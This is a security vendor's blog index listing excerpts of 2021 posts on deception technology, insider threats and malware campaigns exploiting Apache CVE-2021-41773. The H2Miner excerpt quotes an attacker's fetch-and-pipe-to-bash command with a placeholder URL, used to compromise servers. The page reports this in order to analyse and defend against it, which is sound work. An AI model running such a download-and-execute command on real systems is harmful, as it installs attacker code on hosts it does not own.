Blog  

Our blog is a playground with fresh ideas about security and our approach

14 Dec

Top 5 Most-Read Articles of 2021

READ MORE

Curious about which blogs were the most popular this year here at CounterCraft? From highly technical posts with practical applications to in-depth looks at deception technology, our blog featured all manner of articles written by experts in the field. Read on to get the best of what everyone was reading on our website in 2021. Shellcode Detection Using Real-Time Kernel Monitoring This article, written by Alonso Candado, a security software engineer here at CounterCraft, is a quick overview of how to detect shellcodes from the kernel in real time using specific examples.

10 Dec

From the Files: The Original Omicron Virus

READ MORE

Many members of our team have been in cybersecurity for some time now. With the recent news about the latest COVID variant, the oldest of us were reminded of the curious tale of the “original” Omicron virus. Sit back and relax for a vintage cybersecurity tale from Fernando Braquehais, founder and head of development. A few days ago, revising a colleague’s merge request, the Omicron variant of COVID-19 came up. I mentioned what a huge coincidence it was that this variant had the world turned upside down exactly like the famed Flip/Omicron computer virus from decades ago.

7 Dec

blueheaven: Command and Control Malware

READ MORE

The Internet is plagued by automated systems that are looking for vulnerable machines to attack, with the hopes of obtaining desired or exploitable information. In this blog post, we will analyze an attack we detected in one of our internet-facing deception environments: blueheaven malware. This group exploited the CVE-2021-41773 . blueheaven This actor’s domain was purchased on 30th of October of 2021. It is based on a botnet that attacks servers with vulnerabilities, and their main objective is to obtain a shell where they can execute commands and install their malware.

2 Dec

Digital Twin: Finding the Digital Adversary Before They Find You

READ MORE

Are you wondering what solutions really provide your organization with a resilient and strong posture against the digital adversary? Read on to discover how the use of digital twin environments can help you clone your organizations operational infrastructure and behaviors to draw, deter, detect, document, and defend against cyberattacks within your organization. The cybersecurity landscape is an ever-changing environment composed of threat actors and cyber weapons. The ability to lure the digital adversary to an environment so you can detect and defend against these attacks is known as threat deception.

1 Dec

Insider Threats: Five Indicators of Risk & What to Do

READ MORE

Insiders are undoubtedly one of the most concerning threat actors when it comes to establishing a solid cybersecurity posture as they are not easily identifiable by patterns, baselines or known behavior. This makes them the most difficult threat actors to catch. By definition, they have inside knowledge of network architecture, legitimate credentials to make their way to their objectives, and plenty of time to ponder over what next action is to be taken.

30 Nov

What We're Reading

READ MORE

Some interesting and even quirky pieces caught our eye this month. Read on for the news we’ve been following and chatting about around the proverbial water cooler. Microsoft Engineer Says Attackers Don’t Bother Brute-forcing Long Passwords Security Researcher at Microsoft Ross Bevington has used data gathered from a network of honeypot servers to learn more about the actions of threat actors against networks in their server. One of the interesting findings from this deception decoy setup was that 77% of brute force attack attempts on passwords were six numerals or less.

26 Nov

Deception Tops List of Technologies in 2021 IDG Security Priorities Study

READ MORE

From ransomware to malware affecting critical infrastructure, cyber attacks are more mainstream and more damaging than ever. Keeping up with all the attack vectors and evolving threats gets more challenging by the day. IDG’s recently released 2021 Security Priorities study is an important look at the state of security strategies today. This 2021 report provides an in-depth look at the security landscape today from the valuable viewpoint of its top leaders and decision makers.

23 Nov

CounterCraft Named Overall Leader by KuppingerCole

READ MORE

KuppingerCole recently named CounterCraft as an overall leader in their Distributed Deception Platforms Leadership Compass report. CounterCraft appears as an Overall Leader, a Product Leader, and an Innovation Leader. The report, written by John Tolbert, provides an overview of the market for Distributed Deception Platforms (DDPs) and provides a compass to help guide businesses on their solutions. KuppingerCole examines the market segment, vendor service functionality, relative market share, and innovative approaches to providing DDP solutions.

18 Nov

NIST Documents Highlight Deception Technology

READ MORE

Today information security (infosec) and cybersecurity are quickly becoming a top priority for organizations. As it should—there are an estimated 200 Advanced Persistent Threat (APT) groups globally, with new ones popping up every day. From script kiddies to sophisticated technical experts, backed by foreign nations looking to disrupt our way of life for political gain or cybercriminals attacking organizations for monetary gains. In fact, per Accenture, in 2019 the average cost of cybercrime for organizations was $13 million.

16 Nov

CVE-2021-41773 Actively Exploited by H2Miner

READ MORE

Cloud computing has its share of major security threats, and there are some that are both consistent and insistent. One of them is the H2Miner/Kinsing malware. The people behind it use high severity, public vulnerabilities to continue installing their RAT and miner, such as the recent Apache Path Traversal CVE-2021-41773, the last vulnerability added to their already expansive portfolio. In this case, they are looking for servers with mod_cgi enabled in order to directly infect the server by running a simple curl -s URL||wget -q -O- URL) | bash command, which, if successful, will compromise the host and will even return the script output in the HTTP response.